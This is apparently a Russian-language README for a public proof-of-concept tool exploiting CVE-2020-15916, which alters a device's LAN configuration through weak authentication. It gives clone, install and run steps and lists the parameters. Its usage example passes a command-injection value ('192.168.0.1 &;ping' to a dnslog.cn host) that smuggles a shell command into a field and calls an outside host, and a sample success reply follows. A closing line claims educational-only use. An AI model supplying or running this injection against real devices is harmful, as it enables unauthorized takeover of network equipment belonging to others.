
Этот проект является PoC для эксплуатации CVE-2020-15916, уязвимости, которая позволяет несанкционированно изменять конфигурацию LAN устройства.
GenLANConfigAttack представляет собой PoC для эксплуатации уязвимости CVE-2020-15916, которая позволяет несанкционированно изменять конфигурацию LAN устройства.
git clone https://github.com/geniuszly/CVE-2020-15916
pip install -r requirements.txt
python GenLANConfigAttack.py
target_ip: IP-адрес целевого устройства.ping_command: Команда для выполнения на целевом устройстве.session_password: Пароль для сессионного доступа.python GenLANConfigAttack.py --target_ip 192.168.0.1 --session_password gew43t4gtewe4u5u576i7yhggerr6ijtr --ping_command '192.168.0.1 &;ping xt68nd.dnslog.cn'
[Ответ от 192.168.0.1]:
{"success":true,"message":"Конфигурация LAN IP успешно обновлена"}
Этот PoC эксплуатирует уязвимость CVE-2020-15916, которая позволяет злоумышленникам изменять конфигурацию LAN на уязвимых устройствах, используя слабую аутентификацию.
Этот инструмент предоставляется исключительно в образовательных целях. Используйте его ответственно и только в тех средах, где у вас есть явное разрешение.